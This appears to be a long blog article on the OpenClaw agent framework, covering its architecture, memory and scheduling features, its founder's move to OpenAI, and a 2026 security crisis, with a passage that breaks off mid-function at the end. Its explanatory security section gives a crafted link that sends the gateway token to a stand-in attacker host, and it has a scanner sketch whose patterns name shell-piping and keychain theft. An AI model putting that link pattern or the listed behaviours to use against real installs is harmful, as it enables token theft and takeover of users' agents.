In November 2025, an Austrian developer named Peter Steinberger quietly pushed a project called Clawdbot to GitHub. Three months later, it had been renamed OpenClaw, amassed over 234,000 stars, and landed its creator a job at OpenAI — where Sam Altman publicly called him "a genius with a lot of amazing ideas."
Along the way, it weathered a devastating security crisis that exposed 30,000+ instances to remote takeover. Its founder handed the keys to a foundation and walked into the offices of the world's most prominent AI company.
This is the complete story of OpenClaw in 2026: the architecture that made it viral, the memory system that made it sticky, the heartbeat engine that made it unique, the security catastrophe that nearly killed it, and what happens next. Whether you're a developer, a security professional, or an AI enthusiast — this deep dive covers everything you need to know.
TL;DR — OpenClaw 2026 Timeline
Date | Event |
|---|---|
Nov 2025 | Peter Steinberger launches Clawdbot on GitHub |
Late Jan 2026 | Crosses 180,000 GitHub stars; 2M+ visitors in one week |
Jan 30, 2026 | Security patch v2026.1.29 released for CVE-2026-25253 (CVSS 8.8) |
Feb 2026 | ClawHavoc campaign: 341→800+ malicious skills discovered in ClawHub |
Feb 14–15, 2026 | Steinberger announces he's joining OpenAI; foundation transition revealed |
Feb 25, 2026 | OpenAI publishes "Builders Unscripted: Ep. 1 — Peter Steinberger" on YouTube |
Feb 27, 2026 | 234,621 GitHub stars; ClawHub grows to 10,700+ skills |
1. The OpenAI Bombshell: Steinberger Joins, Foundation Born
On February 15, 2026, Peter Steinberger — the Austrian developer behind the fastest-growing open-source project in GitHub history — dropped a blog post on steipete.me that sent shockwaves through the AI industry: he was joining OpenAI.
"I'm joining OpenAI to work on bringing agents to everyone," Steinberger wrote. "OpenClaw will move to a foundation and stay open and independent."
Within hours, Sam Altman posted a confirmation on X that racked up 46,600+ likes: "Peter Steinberger is joining OpenAI to drive the next generation of personal agents. He is a genius with a lot of amazing ideas about very useful things for people."
The announcement was covered by Reuters, TechCrunch, CNBC, Fortune, VentureBeat, and CloudWars — a media blitz usually reserved for billion-dollar funding rounds, not a single developer joining a company. But this wasn't a normal hire, and OpenClaw wasn't a normal project.
Who Is Peter Steinberger?
Before OpenClaw, Steinberger ran a company for 13 years. He's a builder by his own admission — "I'm a builder at heart," he has said — and his technical reputation in the Apple developer community preceded his AI work by over a decade. When he launched what was originally called Clawdbot in November 2025, it was a personal experiment: a single-process AI agent that could connect to WhatsApp, Telegram, Discord, and a dozen other messaging platforms simultaneously.
The project exploded. By late January 2026, OpenClaw (renamed after Anthropic applied trademark pressure on the original "Clawdbot" name, which went through an intermediate rename to "Moltbot" before settling on OpenClaw) had crossed 180,000 GitHub stars and was pulling 2 million+ visitors per week. The concept was deceptively simple: one process, all your messaging channels, persistent memory, and an agent that doesn't just respond — it initiates.
Why OpenAI?
Steinberger's blog post provided rare candor about the decision-making process. He spent time in San Francisco talking with "the major labs" before choosing OpenAI. The reasoning was philosophical as much as practical:
"What I want is to change the world, not build a large company, and teaming up with OpenAI is the fastest way to bring this to everyone."
He described his mission in characteristically plain terms: "My next mission is to build an agent that even my mum can use."
This wasn't an acqui-hire in the traditional sense — OpenAI didn't buy OpenClaw's code or IP. The project moves to an independent, open-source foundation with OpenAI as a sponsor. Steinberger's role at OpenAI is to "drive the next generation of personal agents," which strongly suggests OpenClaw's architecture influenced what OpenAI wants to build internally.
The Foundation Model
The transition to a foundation governance model is the most consequential decision for OpenClaw's existing 234,000+ stargazers. Steinberger explicitly committed to keeping the project "open and independent." OpenAI will continue to sponsor the project — providing funding, likely compute resources, and the implicit stamp of approval that comes with the association — but won't own the codebase.
This mirrors the playbook of other successful open-source foundations (Linux Foundation, Apache, CNCF), but it's unprecedented for a project this young. OpenClaw went from a one-person repo to a foundation-governed project in roughly three months. The speed is dizzying, and it creates real questions about governance, contributor onboarding, and long-term maintenance that we'll explore in Section 6.
Impact on Anthropic
Here's the elephant in the room that few outlets covered: OpenClaw was one of the largest drivers of API traffic to Anthropic's Claude models. The default configuration pointed at Claude, and the hundreds of thousands of developers experimenting with OpenClaw were, by extension, paying Anthropic for API calls.
Steinberger joining OpenAI doesn't automatically flip OpenClaw's defaults away from Claude — the framework is model-agnostic — but the symbolic weight is enormous. The creator of the tool that was minting Anthropic API revenue chose to join Anthropic's primary competitor. The foundation structure theoretically insulates OpenClaw from becoming an OpenAI-exclusive pipeline, but the gravity of having your founder inside OpenAI's walls will inevitably pull the ecosystem toward GPT models.
For Anthropic, this is a case study in platform risk. When your growth partially depends on a third-party open-source project, and that project's creator joins your competitor, the downstream effects are unpredictable. As of this writing, OpenClaw still works beautifully with Claude models, but the narrative has shifted.
Media Coverage and Industry Reaction
The breadth of media coverage tells you how significant this was perceived to be. Reuters — a wire service that typically covers wars, elections, and Fortune 500 earnings — wrote about it. TechCrunch, CNBC, Fortune, VentureBeat, and CloudWars all ran stories. OpenAI itself published a YouTube video titled "Builders Unscripted: Ep. 1 — Peter Steinberger" on February 25, 2026 — making Steinberger the inaugural episode of what appears to be a new content series highlighting builders joining the company.
On Hacker News and Reddit, the reaction was mixed. Many celebrated the foundation model as the right path for open source. Others worried that OpenAI's sponsorship would inevitably compromise OpenClaw's independence. An OpenClaw Discord maintainer captured the community's pragmatic ethos with a characteristically blunt observation about the project's target audience: "If you can't understand how to run a command line, this is far too dangerous of a project for you to use safely."
That quote would prove prophetic as the security crisis unfolded.
2. Architecture Deep Dive: How OpenClaw Actually Works
To understand why OpenClaw went viral — and why its security vulnerabilities were so severe — you need to understand the architecture. This section is technical, but we'll keep it accessible. If you're evaluating OpenClaw for production use, this is the section that matters most.
The Gateway: One Process to Rule Them All
At the heart of OpenClaw is a single long-lived Gateway process that owns all messaging surfaces. This is the fundamental architectural decision that distinguishes OpenClaw from every other AI agent framework: instead of building one bot for Telegram, another for Slack, and a third for Discord, you run one process that connects to all of them simultaneously.
The Gateway is a Node.js process (requires Node ≥22) that manages:
All inbound and outbound message channels
WebSocket connections from control-plane clients
WebSocket connections from nodes (macOS, iOS, Android, headless)
The Canvas web UI served at `/__openclaw__/canvas/` and `/__openclaw__/a2ui/`
Agent sessions, context management, and tool execution
Supported Channels
OpenClaw's channel coverage is extraordinary and is the primary reason for its viral adoption. Each channel is implemented as a plugin:
Channel | Library / Protocol | Status |
|---|---|---|
WhatsApp | Baileys | Core |
Telegram | grammY | Core |
Discord | Native plugin | Core |
Slack | Native plugin | Core |
Signal | Native plugin | Core |
iMessage | Native plugin (macOS node) | Core |
Google Chat | Native plugin | Core |
Microsoft Teams | Native plugin | Core |
WebChat | Built-in | Core |
Mattermost | Community plugin | Community |
Matrix | Community plugin | Community |
Zalo | Community plugin | Community |
This is what made OpenClaw irresistible. A developer could install one tool and immediately have an AI agent accessible from WhatsApp, Telegram, Discord, and Slack — no separate deployments, no separate configurations, no separate billing. The "it just works everywhere" experience is the single biggest driver of adoption.
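To make the plugin model concrete, here is a minimal sketch of what a channel plugin contract could look like. This is illustrative TypeScript, not OpenClaw's actual plugin API; the interface names and method signatures are assumptions.

```typescript
// Hypothetical channel plugin contract. The real OpenClaw plugin API may
// differ; everything here is illustrative.
interface InboundMessage {
  channel: string;
  senderId: string;
  text: string;
  timestamp: number;
}

interface ChannelPlugin {
  name: string;
  // Called by the Gateway on startup to begin receiving messages.
  start(onMessage: (msg: InboundMessage) => void): void;
  // Called to deliver an agent reply back out on this channel.
  send(recipientId: string, text: string): Promise<void>;
}

// A trivial in-memory plugin showing the shape of the contract.
class EchoChannel implements ChannelPlugin {
  name = "echo";
  private handler: ((msg: InboundMessage) => void) | null = null;
  private outbox: string[] = [];

  start(onMessage: (msg: InboundMessage) => void): void {
    this.handler = onMessage;
  }

  async send(recipientId: string, text: string): Promise<void> {
    this.outbox.push(`${recipientId}: ${text}`);
  }

  // Test helper: simulate an inbound message arriving on this channel.
  receive(text: string): void {
    this.handler?.({
      channel: this.name,
      senderId: "u1",
      text,
      timestamp: Date.now(),
    });
  }

  get sent(): string[] {
    return this.outbox;
  }
}
```

The point of the shape: the Gateway only ever talks to the `ChannelPlugin` interface, so adding a thirteenth channel means writing one adapter, not a thirteenth bot.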
The WebSocket Protocol
Control-plane clients (the web UI, CLI tools, extensions) and nodes (macOS, iOS, Android devices) connect to the Gateway via WebSocket on the default port 18789. The wire protocol uses WebSocket text frames with JSON payloads — essentially JSON-RPC over WebSocket.
The connection lifecycle works as follows:
Step | Description |
|---|---|
1. TCP Connect | Client opens a WebSocket to the Gateway (default port 18789) |
2. Connect Handshake | First frame MUST be a "connect" message declaring the client's role (control-plane client or node) |
3. Authentication | If a gateway token is configured, the client must present it before the session proceeds |
4. Session | JSON-RPC messages flow bidirectionally; Gateway routes to appropriate agent session |
This architecture has a critical security implication that we'll explore in Section 5: the WebSocket endpoint, by default, has no origin validation. Any webpage loaded in the user's browser could theoretically open a WebSocket connection to the local Gateway. This design choice — prioritizing ease of setup over security — became the foundation of the CVE-2026-25253 exploit chain.
The Agent Loop
When a message arrives from any channel, it enters the agent loop — a serialized pipeline that runs per session key (called a "session lane") with an optional global lane for cross-session operations. The loop follows this sequence:
Intake: The message arrives from a channel plugin, is normalized into an internal format, and routed to the correct session lane.
Context Assembly: The system prompt is built from multiple sources: the base prompt, skills prompt (from installed skills), bootstrap context, and per-run overrides. Workspace files (SOUL.md, AGENTS.md, USER.md, etc.) are injected into the context window.
Model Inference: The assembled context is sent to the configured LLM provider. OpenClaw is model-agnostic — it works with Claude, GPT, Gemini, Mistral, local models via Ollama, and others.
Tool Execution: If the model requests tool calls, the runtime executes them. Tools come from three sources: built-in tools, installed skills, and workspace-specific tools.
Streaming Replies: Responses stream back to the originating channel (and any connected control-plane clients) in real time.
Persistence: The conversation, tool results, and any memory updates are persisted to the workspace.
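The six stages above can be compressed into a toy loop. This is a heavily simplified sketch of the flow; the real pipeline in pi-agent-core adds streaming, session lanes, and error recovery that this omits:

```typescript
// Toy version of the agent loop: intake, context assembly, inference,
// tool execution, reply. Persistence is left as a comment. All names
// here are illustrative, not pi-agent-core's actual API.
type Turn = { role: "user" | "assistant" | "tool"; content: string };

async function agentTurn(
  inbound: string,
  history: Turn[],
  systemPrompt: string,
  callModel: (ctx: string) => Promise<{ text: string; toolCall?: string }>,
  runTool: (name: string) => Promise<string>,
): Promise<Turn[]> {
  // 1. Intake: normalize the inbound message into the session lane.
  history.push({ role: "user", content: inbound });

  // 2-5. Assemble context, call the model, execute tools until it answers.
  // (A real runtime caps tool iterations; this sketch trusts the model.)
  for (;;) {
    const ctx = [systemPrompt, ...history.map((t) => `${t.role}: ${t.content}`)].join("\n");
    const out = await callModel(ctx); // 3. model inference
    if (out.toolCall) {
      const result = await runTool(out.toolCall); // 4. tool execution
      history.push({ role: "tool", content: result });
      continue; // loop back with the tool result in context
    }
    history.push({ role: "assistant", content: out.text }); // 5. reply
    break;
  }
  // 6. Persistence: a real runtime writes `history` and memory updates
  // to the workspace here.
  return history;
}
```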
Pi Framework and pi-agent-core
Under the hood, the agent loop is powered by pi-agent-core, OpenClaw's internal runtime. The function runEmbeddedPiAgent is the entry point — it takes the assembled context, model configuration, and tool definitions, then manages the inference-and-tool-execution cycle until the model produces a final response.
The Pi framework handles several critical concerns:
Session serialization: Only one agent turn runs per session at a time, preventing race conditions when messages arrive faster than the model can respond.
Skill injection: Skills are loaded and injected into both the environment (making their tools available) and the prompt (giving the model instructions on how to use them).
Context management: As conversations grow, the framework manages compaction — summarizing older context to stay within the model's context window while preserving critical information.
Error recovery: If a tool call fails or the model produces malformed output, the framework retries with error context.
Workspace Files: The Agent's Brain
One of OpenClaw's most distinctive features is its use of plain Markdown files as the agent's configuration and personality layer. These files live in the workspace directory and are injected into the agent's context on every run:
File | Purpose | Required? |
|---|---|---|
| `AGENTS.md` | Operating instructions, rules, priorities — the "how to behave" file | Recommended |
| `SOUL.md` | Persona, tone, and boundaries | Recommended |
| `USER.md` | Who the user is and how to address them | Optional |
| `IDENTITY.md` | Agent's name, vibe, emoji | Optional |
| `TOOLS.md` | Notes about local tools and conventions (does NOT control tool availability) | Optional |
| `HEARTBEAT.md` | Proactive task checklist for heartbeat runs | Optional |
| `BOOT.md` | Startup checklist on gateway restart | Optional |
| `BOOTSTRAP.md` | One-time first-run ritual (deleted after completion) | Optional |
This approach is inspired by how developers use README.md and .github/ directories — familiar, version-controllable, and human-readable. Instead of complex YAML configuration files or database-driven settings, your agent's entire personality and operating instructions live in files you can edit with any text editor and commit to Git.
The elegance of this design is that it makes agent behavior transparent. You can read the files and know exactly what the agent will do. You can diff changes. You can code-review personality updates. This is a radically different approach from black-box agent platforms where behavior is configured through web dashboards and stored in opaque databases.
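As a rough illustration, injecting these files into the system prompt amounts to concatenating whichever ones exist. The ordering and section formatting below are assumptions, not OpenClaw's actual behavior:

```typescript
// Sketch of workspace-file injection: build the system prompt by
// appending each present Markdown file as its own section. The file
// ordering and heading format are illustrative assumptions.
const WORKSPACE_FILES = ["AGENTS.md", "SOUL.md", "USER.md", "IDENTITY.md", "TOOLS.md"];

function assembleSystemPrompt(basePrompt: string, workspace: Map<string, string>): string {
  const sections = [basePrompt];
  for (const name of WORKSPACE_FILES) {
    const body = workspace.get(name);
    if (body) sections.push(`## ${name}\n${body.trim()}`); // missing optional files are skipped
  }
  return sections.join("\n\n");
}
```

Because the inputs are plain files, "debugging the agent's personality" reduces to reading the exact string this kind of function produces.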
Skills and ClawHub
Skills are OpenClaw's plugin system — reusable packages that add tools, prompts, and behaviors to the agent. They can be installed from ClawHub (the public registry), from Git repositories, or created locally in the workspace's skills/ directory.
The ClawHub registry has grown explosively, from 2,857 skills in late January 2026 to over 10,700 skills by late February. Skills range from simple utilities (web search, file management) to complex integrations (CRM connections, deployment pipelines, monitoring dashboards).
However, as we'll explore in Section 5, this rapid growth came with severe security consequences. The ClawHub marketplace had minimal vetting processes, and by February 2026, researchers discovered that approximately 20% of all listed skills were malicious.
3. Memory System Deep Dive: How OpenClaw Remembers
Memory is the feature that separates a useful chatbot from a genuine personal agent. If your AI assistant forgets everything the moment the conversation ends, it's a tool. If it remembers your preferences, your ongoing projects, your communication style, and the context from three weeks ago — it's an assistant. OpenClaw's memory system is one of its most thoughtfully designed components, and understanding it explains why users become so attached to the platform.
Plain Markdown as Source of Truth
In a world where every SaaS product stores your data in proprietary databases behind API walls, OpenClaw made a radical choice: memory is just Markdown files on your filesystem.
There are no databases. No vector stores you can't inspect. No opaque embedding formats. Your agent's entire memory is stored in files you can open, read, edit, and back up with `cp`. This is not just a philosophical stance — it has practical implications for portability, debugging, and trust.
The Two-Layer Memory System
OpenClaw's memory operates on two layers that work together:
Layer | File Pattern | Purpose | Lifecycle |
|---|---|---|---|
Daily Logs | `memory/YYYY-MM-DD.md` | Granular, timestamped record of each day's interactions, decisions, and observations | Created daily, accumulates indefinitely |
Curated Memory | `MEMORY.md` | Distilled long-term knowledge: user preferences, project context, key facts | Actively maintained, updated by agent (main session only) |
Daily logs (memory/YYYY-MM-DD.md) capture the raw stream of what happened each day. The agent writes entries as events occur — tasks completed, decisions made, information learned, errors encountered. Think of these as the agent's diary.
Curated memory (MEMORY.md) is the distilled, organized version — the agent's long-term knowledge base. It contains user preferences ("Nishant prefers American English"), project context ("The blog uses Next.js on Vercel"), ongoing task states, and key facts that should persist across all sessions. Only the main session writes to MEMORY.md, preventing conflicts from parallel sessions.
Memory Tools: Search and Retrieval
The agent has two primary tools for accessing memory:
memory_search (Semantic Recall): Uses vector embeddings to find relevant memories based on meaning, not just keywords. If the agent needs to recall "what project was the user working on last week," it runs a semantic search across all memory files and retrieves the most relevant passages. This is powered by the vector search system described below.
memory_get (Targeted Read): Directly reads a specific memory file when the agent knows exactly what it needs. For example, reading today's log (memory/2026-02-27.md) or the main MEMORY.md for long-term context.
The combination is powerful: semantic search handles the "I vaguely remember something about..." cases, while targeted reads handle the "What did we do yesterday?" cases.
Automatic Memory Flush Before Compaction
As conversations grow long, they eventually exceed the model's context window. OpenClaw handles this through compaction — summarizing older conversation turns to free up context space. But here's the critical innovation: before compacting, the system triggers an automatic memory flush.
This is a silent agentic turn — invisible to the user — where the agent reviews the conversation that's about to be compacted and writes any important information to durable memory files. The idea is simple but crucial: before we forget the conversation details, make sure the important parts are saved.
The flush is controlled by the agents.defaults.compaction.memoryFlush configuration. The soft threshold triggers when the estimated token count crosses contextWindow - reserveTokensFloor - softThresholdTokens. Only one flush occurs per compaction cycle, preventing runaway memory writes.
This solves one of the hardest problems in agent memory: the "lost context" problem. In most chatbot systems, when the conversation exceeds the context window, information simply drops off the end. Users have to repeat themselves. OpenClaw's flush mechanism ensures that critical context survives compaction by writing it to persistent storage before the context window rolls over.
Vector Search: sqlite-vec and Provider Selection
Under the hood, semantic memory search is powered by a vector index built over MEMORY.md and all memory/*.md files. The system watches for file changes (debounced to avoid unnecessary reindexing) and rebuilds the index as memories evolve.
The vector store uses sqlite-vec for acceleration — a SQLite extension that enables efficient nearest-neighbor search directly within a SQLite database. This means no external vector database is needed; everything stays local, fast, and portable.
For generating embeddings, OpenClaw auto-selects a provider based on what's available in the environment. The priority chain is:
1. Local: `node-llama-cpp` (fully offline, no API calls)
2. OpenAI: OpenAI embeddings API
3. Gemini: Google Gemini embeddings
4. Voyage: Voyage AI embeddings
5. Mistral: Mistral AI embeddings
The auto-selection is a thoughtful design choice. If the user has a powerful local machine, embeddings are generated locally with zero API cost. If they're running on a lightweight server, the system falls back to cloud providers. No configuration needed — it just works.
QMD Backend (Experimental)
For users who want more sophisticated search capabilities, OpenClaw offers an experimental QMD backend. QMD (created by Tobi, available at github.com/tobi/qmd) is a local-first search system that combines three retrieval strategies:
BM25: Traditional keyword-based scoring (great for exact term matches)
Vector search: Semantic similarity (great for conceptual matches)
Reranking: A secondary model that reorders results for relevance
This "hybrid search" approach addresses a fundamental limitation of pure vector search: it can miss results that share exact keywords but have different semantic embeddings. BM25 catches those cases, and the reranker ensures the final results are properly prioritized.
QMD runs fully locally via Bun + node-llama-cpp and auto-downloads GGUF models from HuggingFace. To enable it, you set memory.backend = "qmd" in the configuration. It's experimental, but it represents the direction agent memory systems are heading: multi-strategy retrieval that combines the strengths of keyword, semantic, and neural approaches.
Comparison to Other Agent Memory Systems
Most competing agent frameworks handle memory in one of three ways: they don't (stateless per conversation), they use a proprietary database (opaque, non-portable), or they use a vector database (requires separate infrastructure). OpenClaw's approach — plain files + local vector index + optional hybrid search — sits in a unique sweet spot:
Approach | Portability | Inspectable | Infrastructure |
|---|---|---|---|
Stateless (no memory) | N/A | N/A | None |
Proprietary DB | Low | No | Cloud service |
External vector DB | Medium | Partially | Separate service |
OpenClaw (Markdown + sqlite-vec) | High | Yes | None (local) |
The tradeoff is scale. OpenClaw's memory system works beautifully for individual users and small teams but isn't designed for enterprise-scale knowledge management across thousands of agents. For that use case, you'd need a centralized solution — which is one area where managed platforms have an advantage.
4. Heartbeat & Proactive Agents: The Feature Nobody Else Has
Here's what makes OpenClaw fundamentally different from every other AI agent framework on the market: it doesn't just respond. It initiates.
Every other agent framework — LangChain, CrewAI, AutoGen, Claude Code, GitHub Copilot — operates on a request-response model. The user asks, the agent answers. The user stops asking, the agent stops working. The agent is reactive, never proactive.
OpenClaw broke this pattern with its Heartbeat system, and it's arguably the single most important architectural innovation in the project.
What Is HEARTBEAT.md?
HEARTBEAT.md is a Markdown file in the workspace that defines proactive tasks the agent should perform on a schedule — without any user prompt. When a heartbeat fires, the agent wakes up, reads HEARTBEAT.md, and autonomously performs the tasks defined there.
Here's what makes this powerful: the tasks are defined in natural language. You don't write cron scripts or configure webhook endpoints. You write instructions in plain English, and the agent follows them. For example:
# HEARTBEAT.md
## Morning Briefing
- Every day at 9am, check my calendar and summarize today's schedule
- Send the summary to my WhatsApp
## Price Monitor
- Every 4 hours, check if AAPL dropped more than 2% today
- If yes, send me a Telegram alert
## Content Check
- Every Monday at 10am, review the content calendar
- Draft social posts for any articles published last week
Schedule Types
The heartbeat system supports three scheduling modes:
Type | Behavior | Use Case |
|---|---|---|
at | One-shot at a specific time | Reminders, one-time checks |
every | Recurring interval (e.g., every 4 hours) | Monitoring, periodic checks |
cron | Standard cron expression | Complex scheduling, business-hours-only tasks |
Under the hood, cron-based wake-ups trigger heartbeat polls. The system supports two execution modes:
systemEvent (main session): The heartbeat runs in the main agent session, with full access to conversation history and memory. Best for tasks that need context about what the user has been working on.
agentTurn (isolated session): The heartbeat runs in a fresh, isolated session. Best for independent tasks that shouldn't be influenced by (or pollute) the main conversation context.
Real-World Use Cases
The heartbeat system enables workflows that simply aren't possible with reactive agents:
Morning Briefings: Wake up at 7 AM, check email, calendar, news, and weather. Compile a personalized summary. Send it to WhatsApp before the user starts their day. No prompt needed — the agent does this autonomously.
Monitoring and Alerting: Check server status every 30 minutes. Monitor competitor pricing daily. Watch for mentions of your brand on social media. Alert via Telegram, Slack, or WhatsApp when something needs attention.
Content Management: Every Monday, review the content calendar and draft social posts for the week. Every evening, check analytics and report on article performance. Weekly, identify trending topics and suggest new content ideas.
Personal Finance: Daily portfolio summary at market close. Alert if any holding drops more than a specified threshold. Weekly expense categorization from bank transaction data.
Team Coordination: Daily standup summary at 9 AM. Sprint progress update every Friday. Automatic follow-up on overdue tasks.
Why No Other Framework Does This
The absence of proactive scheduling in other agent frameworks isn't an oversight — it's an architectural consequence. To run proactive tasks, you need:
A persistent process: The agent must be running all the time, not spun up on demand. OpenClaw's Gateway is a long-lived process by design.
Persistent memory: The agent needs to remember what tasks are scheduled and what it did last time. OpenClaw's file-based memory provides this.
Multi-channel output: The agent needs to send notifications without the user being "in" a conversation. OpenClaw's multi-channel Gateway enables this.
A scheduling system: Cron or equivalent, integrated into the agent runtime.
Most agent frameworks are designed as libraries, not services. They run when called and stop when done. OpenClaw is designed as an always-on daemon — a persistent process that lives on your machine (or server) and acts on your behalf even when you're not actively using it.
This is the conceptual leap that made Steinberger's tagline resonate: "The claw is the law." The agent isn't waiting for you. It's working for you.
The heartbeat system is almost certainly what caught OpenAI's attention. Steinberger's stated mission at OpenAI — "build an agent that even my mum can use" — implies bringing this always-on, proactive agent paradigm to mainstream users, not just developers who can configure HEARTBEAT.md files and cron expressions.
5. The ClawHub Security Crisis: CVE-2026-25253 and the ClawHavoc Campaign
For every inspiring detail about OpenClaw's architecture, there's a corresponding security horror story. The project's explosive growth — from obscurity to 234,000 stars in three months — outpaced its security posture by a devastating margin. In January and February 2026, security researchers revealed vulnerabilities so severe that they called into question whether OpenClaw should be deployed at all without significant hardening.
This section isn't written to alarm — it's written to inform. If you're running OpenClaw, you need to understand exactly what happened and what's been fixed.
CVE-2026-25253: The One-Click RCE Chain
On February 18, 2026, security firm Conscia published a detailed writeup of CVE-2026-25253, a vulnerability they rated CVSS 8.8 (High). The exploit was elegant, devastating, and exploited a fundamental architectural weakness in OpenClaw's design.
The attack is a one-click Remote Code Execution (RCE) chain that works in three stages:
Stage 1: Token Exfiltration
The Control UI (OpenClaw's web interface) accepts a gatewayUrl query parameter. An attacker crafts a malicious link — something like https://openclaw-instance.local/__openclaw__/canvas/?gatewayUrl=wss://attacker.com — and sends it to the victim. When the victim clicks the link, the Control UI connects to the attacker's WebSocket server instead of the legitimate Gateway, leaking the authentication token (OPENCLAW_GATEWAY_TOKEN) in the handshake.
Stage 2: Cross-Site WebSocket Hijacking
With the token in hand, the attacker now exploits a critical flaw: the Gateway has no Origin validation on WebSocket connections. This means the attacker can open a WebSocket connection from any webpage directly to the victim's Gateway. If the victim's browser is on the same network as the Gateway (which is almost always the case for localhost deployments), the attacker can connect and authenticate with the stolen token.
Stage 3: Gateway Takeover
Once connected and authenticated, the attacker has full control of the Gateway. They can execute arbitrary commands via the agent's tool system, read files from the workspace (including credentials stored in plaintext), send messages on behalf of the user across all connected channels, and install malicious skills.
The exploit is devastating because it works even against localhost-bound instances. Many users assumed that binding the Gateway to 127.0.0.1 was sufficient protection — after all, the Gateway isn't exposed to the internet. But the attack pivots through the victim's browser, which is on localhost. The browser becomes the bridge between the internet and the local Gateway.
Why Localhost-Only Isn't a Defense
This is worth emphasizing because it's a common misconception in the developer community: binding a service to localhost does not protect it from browser-based attacks.
Your browser runs on localhost. When you visit a malicious webpage, JavaScript on that page can make requests to localhost:18789 (or any local port). Without proper CORS headers and Origin validation on WebSocket connections, any local service is reachable from any webpage you visit. The same-origin policy protects reading HTTP responses, but WebSocket connections don't have equivalent built-in protections.
OpenClaw's architecture compounded this by storing credentials in plaintext workspace files and having no WebSocket Origin validation. The combination meant that a single clicked link could give an attacker complete control over the user's AI agent, all connected messaging accounts, and any credentials stored in the workspace.
The ClawHavoc Campaign
While CVE-2026-25253 was a vulnerability in OpenClaw itself, the ClawHavoc campaign targeted the ClawHub skills registry — the marketplace where users install third-party skills.
Security researchers initially discovered 341 malicious skills in the ClawHub registry, representing approximately 12% of the total 2,857 skills listed at the time. Subsequent scans revealed the problem was far worse: over 800 malicious skills, comprising roughly 20% of the registry as it grew to over 10,700 total skills.
The malicious skills primarily delivered the Atomic macOS Stealer (AMOS), a well-known macOS malware family that harvests credentials, cryptocurrency wallets, browser data, and keychain contents. Given OpenClaw's popularity among Mac-using developers, the targeting was devastatingly precise.
The attack vector was simple: publish skills with appealing names and descriptions to ClawHub. When users install them, the skills execute malicious code with the full permissions of the OpenClaw Gateway process — which, on most setups, has access to the user's home directory, messaging credentials, API keys, and more.
30,000+ Exposed Instances
The scale of exposure was staggering. According to data from Censys, Bitsight, and Hunt.io, the number of internet-exposed OpenClaw instances grew from approximately 1,000 to over 21,000 between January 25 and January 31, 2026 alone. By the time of the security disclosures, the total exceeded 30,000 exposed instances.
Many of these instances were running without authentication — meaning anyone who could reach the WebSocket port could connect and take control. No exploit chain needed. No clever attacks. Just connect and own it.
Enterprise Shadow AI
Perhaps most concerning for corporate security teams: OpenClaw was showing up on enterprise networks. Bitdefender GravityZone detected OpenClaw on corporate endpoints, flagging it as a Shadow AI concern. Employees were installing it on work machines without IT approval, connecting it to company Slack instances, and feeding it proprietary data — all through an agent framework with known critical vulnerabilities.
Security firms including Cyera and Cato Networks specifically called out OpenClaw as a case study in the dangers of unmanaged AI agent deployment. Immersive Labs and Repello AI published testing frameworks for evaluating agent security, with OpenClaw as a primary reference.
The Patch and Remaining Concerns
The core vulnerability (CVE-2026-25253) was patched in v2026.1.29, released on January 30, 2026. Additional CVEs were also addressed:
CVE-2026-24763: Related vulnerability in the Gateway
CVE-2026-25157: Command injection vulnerability
However, the patch only addresses the specific exploit chain. The architectural risks that enabled it persist to varying degrees:
| Risk | Status Post-Patch |
|---|---|
| WebSocket Origin validation | Fixed in v2026.1.29 |
| gatewayUrl parameter injection | Fixed in v2026.1.29 |
| Credentials in plaintext files | Architectural — not yet addressed |
| ClawHub skill vetting | Improving, but a 20% malicious rate is concerning |
| Default no-auth Gateway | Auth optional, not enforced |
The sources for this section — Conscia, Kaspersky, Jamf, Tenable, Cyera, Immersive Labs, Cato Networks, and Repello AI — represent a broad consensus in the security community: OpenClaw is a powerful tool that was deployed at scale before its security model was ready for it.
6. Where OpenClaw Goes From Here
As of February 27, 2026, OpenClaw sits at 234,621 GitHub stars with 45,141 forks, making it one of the most-starred repositories in GitHub history. The MIT-licensed project has survived a naming crisis (Clawdbot → Moltbot → OpenClaw), a security catastrophe, and its founder's departure for OpenAI. The question now is: what happens next?
Foundation Governance
The transition to foundation governance is the single most important factor in OpenClaw's survival. Open-source projects that depend on a single maintainer are fragile; projects with foundation governance — clear contributor processes, shared ownership, organizational backing — tend to outlast their creators.
Steinberger's commitment that OpenClaw will "stay open and independent" is promising, but the foundation is brand new. It needs to establish contributor guidelines, a security review process, a release cadence, and — most importantly — a governance model for ClawHub that prevents another 20%-malicious-skills situation.
OpenAI Sponsorship
OpenAI's continued sponsorship of the project creates an interesting dynamic. On one hand, it provides financial stability and legitimacy. On the other hand, it creates a perceived alignment that could discourage contributions from developers working with competing models.
The key question: will OpenClaw maintain its model-agnostic stance? The framework currently works with Claude, GPT, Gemini, Mistral, and local models. If OpenAI's sponsorship subtly pushes the project toward GPT-first development, it could fracture the community.
The Skills Ecosystem
The ClawHub registry's growth from 2,857 skills to over 10,700 in roughly a month is explosive — and the 20% malicious rate is unacceptable. The foundation's first priority must be implementing rigorous skill vetting: automated security scanning, code review requirements, publisher verification, and a rapid response process for reported malicious skills.
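As a sketch of what the automated-scanning layer might look like, here is a toy static check that flags source patterns common in infostealer droppers. The pattern list is hypothetical and purely illustrative; a real vetting pipeline would pair static checks with sandboxed dynamic analysis and publisher verification:

```python
import re

# Patterns commonly abused by malicious installers/stealers (illustrative).
SUSPICIOUS_PATTERNS = {
    "remote script piped to shell": r"curl\s+\S+\s*\|\s*(ba|z)?sh",
    "macOS keychain access": r"security\s+find-generic-password",
    "embedded base64 payload decode": r"base64\s+(-d|--decode)",
}

def scan_skill_source(source: str) -> list:
    """Return human-readable labels for every suspicious pattern found."""
    return [label for label, pattern in SUSPICIOUS_PATTERNS.items()
            if re.search(pattern, source)]
```

A static scan like this is cheap enough to run on every ClawHub upload; the hard part is keeping false positives low enough that publishers tolerate it.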
A healthy skills ecosystem is OpenClaw's moat. If developers can trust the registry, it becomes the npm/pip equivalent for AI agents — a critical part of the infrastructure. If they can't trust it, it becomes a liability.
Security Improvements
Beyond ClawHub vetting, OpenClaw needs fundamental security improvements:
Credential management: Move away from plaintext credential storage. At minimum, integrate with system keychains (macOS Keychain, Linux Secret Service).
Default authentication: Make Gateway authentication the default, not optional.
Sandboxed skill execution: Skills should run in isolated environments, not with full Gateway permissions.
Security auditing: Regular third-party security audits, published transparently.
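The default-authentication point above can be illustrated in a few lines: compare a shared token in constant time and fail closed when none is configured, instead of treating a missing token as "no auth required". OPENCLAW_GATEWAY_TOKEN is the variable the project documents; the function itself is a hypothetical sketch:

```python
import hmac
import os

def check_gateway_auth(presented) -> bool:
    """Fail-closed token check for incoming Gateway connections.

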